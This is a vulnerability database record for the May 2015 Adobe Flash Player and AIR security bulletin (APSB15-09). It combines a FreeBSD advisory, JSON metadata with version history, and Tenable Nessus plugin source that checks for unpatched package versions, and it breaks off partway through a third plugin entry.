ID E206DF57-F97B-11E4-B799-C485083CA99C Type freebsd Reporter FreeBSD Modified 2015-05-12T00:00:00
Description
Adobe reports:
Adobe has released security updates for Adobe Flash Player for
Windows, Macintosh and Linux. These updates address vulnerabilities
that could potentially allow an attacker to take control of the
affected system. Adobe recommends users update their product
installations to the latest versions.
These updates resolve memory corruption vulnerabilities that could
lead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,
CVE-2015-3093).
These updates resolve a heap overflow vulnerability that could lead
to code execution (CVE-2015-3088).
These updates resolve a time-of-check time-of-use (TOCTOU) race
condition that could be exploited to bypass Protected Mode in
Internet Explorer (CVE-2015-3081).
These updates resolve validation bypass issues that could be
exploited to write arbitrary data to the file system under user
permissions (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).
These updates resolve an integer overflow vulnerability that could
lead to code execution (CVE-2015-3087).
These updates resolve a type confusion vulnerability that could lead
to code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).
These updates resolve a use-after-free vulnerability that could lead
to code execution (CVE-2015-3080).
These updates resolve memory leak vulnerabilities that could be used
to bypass ASLR (CVE-2015-3091, CVE-2015-3092).
These updates resolve a security bypass vulnerability that could lead
to information disclosure (CVE-2015-3079), and provide additional
hardening to protect against CVE-2015-3044.
{"id": "E206DF57-F97B-11E4-B799-C485083CA99C", "bulletinFamily": "unix", "title": "Adobe Flash Player -- critical vulnerabilities", "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. Adobe recommends users update their product\n\t installations to the latest versions.\n\t \n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n\t CVE-2015-3093).\n\t \n\n\t These updates resolve a heap overflow vulnerability that could lead\n\t to code execution (CVE-2015-3088).\n\t \n\n\t These updates resolve a time-of-check time-of-use (TOCTOU) race\n\t condition that could be exploited to bypass Protected Mode in\n\t Internet Explorer (CVE-2015-3081).\n\t \n\n\t These updates resolve validation bypass issues that could be\n\t exploited to write arbitrary data to the file system under user\n\t permissions (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\t \n\n\t These updates resolve an integer overflow vulnerability that could\n\t lead to code execution (CVE-2015-3087).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\t \n\n\t These updates resolve a use-after-free vulnerability that could lead\n\t to code execution (CVE-2015-3080).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\t \n\n\t These updates resolve a security bypass vulnerability that could lead\n\t to information disclosure (CVE-2015-3079), and provide additional\n\t hardening to protect against CVE-2015-3044.\n\t \n\n", "published": "2015-05-12T00:00:00", "modified": "2015-05-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vuxml.freebsd.org/freebsd/e206df57-f97b-11e4-b799-c485083ca99c.html", "reporter": "FreeBSD", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "type": "freebsd", "lastseen": "2018-08-31T01:14:41", "history": [{"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "le", "packageFilename": "UNKNOWN", "packageName": "linux-c6-flashplugin", "packageVersion": "11.2r202.457"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "le", "packageFilename": "UNKNOWN", "packageName": "linux-f10-flashplugin", "packageVersion": "11.2r202.457"}], "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. Adobe recommends users update their product\n\t installations to the latest versions.\n\t \n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n\t CVE-2015-3093).\n\t \n\n\t These updates resolve a heap overflow vulnerability that could lead\n\t to code execution (CVE-2015-3088).\n\t \n\n\t These updates resolve a time-of-check time-of-use (TOCTOU) race\n\t condition that could be exploited to bypass Protected Mode in\n\t Internet Explorer (CVE-2015-3081).\n\t \n\n\t These updates resolve validation bypass issues that could be\n\t exploited to write arbitrary data to the file system under user\n\t permissions (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\t \n\n\t These updates resolve an integer overflow vulnerability that could\n\t lead to code execution (CVE-2015-3087).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\t \n\n\t These updates resolve a use-after-free vulnerability that could lead\n\t to code execution (CVE-2015-3080).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\t \n\n\t These updates resolve a security bypass vulnerability that could lead\n\t to information disclosure (CVE-2015-3079), and provide additional\n\t hardening to protect against CVE-2015-3044.\n\t \n\n", "edition": 2, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}}, "hash": "2df71d5e68bf0f10aae7170cdfc185411f5acd15471ad8b86bd05fa3c4af1742", "hashmap": [{"hash": "d4ef599acc15d6832fe74b4eaf312dd7", "key": "description"}, {"hash": "f6dbc65eaed0c05479bdbd0b4b1ac361", "key": "references"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "1dda7b8fb0ca6c3dd03e2e1fa04be269", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5aa82e2f22093ff0df15427126a4a3af", "key": "href"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "3b378155d03cbed3223efb78caf49713", "key": "affectedPackage"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "1dda7b8fb0ca6c3dd03e2e1fa04be269", "key": "modified"}, {"hash": "f4289971a3a429ad0ed013ac201ffc00", "key": "title"}, {"hash": "60495807793d66d19b10ae8331f2d3d3", "key": "cvelist"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/e206df57-f97b-11e4-b799-c485083ca99c.html", "id": "E206DF57-F97B-11E4-B799-C485083CA99C", "lastseen": "2018-08-30T19:14:30", "modified": "2015-05-12T00:00:00", "objectVersion": "1.3", "published": "2015-05-12T00:00:00", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "reporter": "FreeBSD", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:14:30"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "le", "packageFilename": "UNKNOWN", "packageName": "linux-c6-flashplugin", "packageVersion": "11.2r202.457"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "le", "packageFilename": "UNKNOWN", "packageName": "linux-f10-flashplugin", "packageVersion": "11.2r202.457"}], "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. Adobe recommends users update their product\n\t installations to the latest versions.\n\t \n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n\t CVE-2015-3093).\n\t \n\n\t These updates resolve a heap overflow vulnerability that could lead\n\t to code execution (CVE-2015-3088).\n\t \n\n\t These updates resolve a time-of-check time-of-use (TOCTOU) race\n\t condition that could be exploited to bypass Protected Mode in\n\t Internet Explorer (CVE-2015-3081).\n\t \n\n\t These updates resolve validation bypass issues that could be\n\t exploited to write arbitrary data to the file system under user\n\t permissions (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\t \n\n\t These updates resolve an integer overflow vulnerability that could\n\t lead to code execution (CVE-2015-3087).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\t \n\n\t These updates resolve a use-after-free vulnerability that could lead\n\t to code execution (CVE-2015-3080).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\t \n\n\t These updates resolve a security bypass vulnerability that could lead\n\t to information disclosure (CVE-2015-3079), and provide additional\n\t hardening to protect against CVE-2015-3044.\n\t \n\n", "edition": 1, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}}, "hash": "17414fefaeb9865fd37ddae6f77c098ec4fe3954a7935424d44aecb5cb7e33a6", "hashmap": [{"hash": "d4ef599acc15d6832fe74b4eaf312dd7", "key": "description"}, {"hash": "f6dbc65eaed0c05479bdbd0b4b1ac361", "key": "references"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "1dda7b8fb0ca6c3dd03e2e1fa04be269", "key": "published"}, {"hash": "5aa82e2f22093ff0df15427126a4a3af", "key": "href"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "3b378155d03cbed3223efb78caf49713", "key": "affectedPackage"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "1dda7b8fb0ca6c3dd03e2e1fa04be269", "key": "modified"}, {"hash": "f4289971a3a429ad0ed013ac201ffc00", "key": "title"}, {"hash": "60495807793d66d19b10ae8331f2d3d3", "key": "cvelist"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/e206df57-f97b-11e4-b799-c485083ca99c.html", "id": "E206DF57-F97B-11E4-B799-C485083CA99C", "lastseen": "2016-09-26T17:24:19", "modified": "2015-05-12T00:00:00", "objectVersion": "1.2", "published": "2015-05-12T00:00:00", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "reporter": "FreeBSD", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-09-26T17:24:19"}], "edition": 3, "hashmap": [{"key": "affectedPackage", "hash": "3b378155d03cbed3223efb78caf49713"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "60495807793d66d19b10ae8331f2d3d3"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "d4ef599acc15d6832fe74b4eaf312dd7"}, {"key": "href", "hash": "5aa82e2f22093ff0df15427126a4a3af"}, {"key": "modified", "hash": "1dda7b8fb0ca6c3dd03e2e1fa04be269"}, {"key": "published", "hash": "1dda7b8fb0ca6c3dd03e2e1fa04be269"}, {"key": "references", "hash": "f6dbc65eaed0c05479bdbd0b4b1ac361"}, {"key": "reporter", "hash": "a3dc630729e463135f4e608954fa6e19"}, {"key": "title", "hash": "f4289971a3a429ad0ed013ac201ffc00"}, {"key": "type", "hash": "1527e888767cdce15d200b870b39cfd0"}], "hash": "17414fefaeb9865fd37ddae6f77c098ec4fe3954a7935424d44aecb5cb7e33a6", "viewCount": 0, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "vulnersScore": 10.0}, "objectVersion": "1.3", "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "le", "packageFilename": "UNKNOWN", "packageName": "linux-c6-flashplugin", "packageVersion": "11.2r202.457"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "le", "packageFilename": "UNKNOWN", "packageName": "linux-f10-flashplugin", "packageVersion": "11.2r202.457"}]}
{"nessus": [{"lastseen": "2018-09-01T23:51:33", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=930677", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "83559", "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix several security issues.\n\nThe following vulnerabilities were fixed (bsc#930677) :\n\n - APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079, CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083, CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087, CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091, CVE-2015-3092, CVE-2015-3093\n\nMore information can be found at the Adobe Security Bulletin APSB15-09:\nhttps://helpx.adobe.com/security/products/flash-player/apsb15-09.html", "edition": 4, "reporter": "Tenable", "published": "2015-05-20T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2015-372)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-06-26T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-372.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83559", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-372.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83559);\n script_version(\"$Revision: 2.8 $\");\n script_cvs_date(\"$Date: 2015/06/26 17:41:33 $\");\n\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2015-372)\");\n script_summary(english:\"Check for the openSUSE-2015-372 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Adobe flash-player package was updated to version 11.2.202.460 to\nfix several security issues.\n\nThe following vulnerabilities were fixed (bsc#930677) :\n\n - APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078,\n CVE-2015-3079, CVE-2015-3080, CVE-2015-3081,\n CVE-2015-3082, CVE-2015-3083, CVE-2015-3084,\n CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3091, CVE-2015-3092, CVE-2015-3093\n\nMore information can be found at the Adobe Security Bulletin\nAPSB15-09:\nhttps://helpx.adobe.com/security/products/flash-player/apsb15-09.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=930677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.460-116.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.460-116.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.460-116.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.460-2.51.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.460-2.51.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.460-2.51.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:34:04", "references": ["http://www.nessus.org/u?0cb17c10", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "84161", "description": "According to its version, the installation of Adobe AIR on the remote Mac OS X host is equal or prior to 17.0.0.144. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper validation of user-supplied input. A remote attacker can exploit these flaws, via specially crafted flash content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a context-dependent attacker to disclose sensitive information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race condition exists that allows an attacker to bypass Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that allow an attacker to read and write arbitrary data to the file system. (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085)\n\n - An integer overflow condition exists due to improper validation of user-supplied input. This allows a context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper validation of user-supplied input. A remote attacker can exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an attacker to bypass the Address Space Layout Randomization (ASLR) feature. (CVE-2015-3091, CVE-2015-3092)", "edition": 7, "reporter": "Tenable", "published": "2015-06-12T00:00:00", "title": "Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-09)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB15-09.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84161", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84161);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3081\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74613,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-09)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe AIR 17.0.0.172 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '17.0.0.144';\nfixed_version_for_report = '17.0.0.172';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:10:56", "references": ["http://www.nessus.org/u?0cb17c10", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "83367", "description": "The version of Adobe Flash Player installed on the remote Mac OS X host is equal or prior to version 17.0.0.169. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that allows an attacker to disclose sensitive information.\n 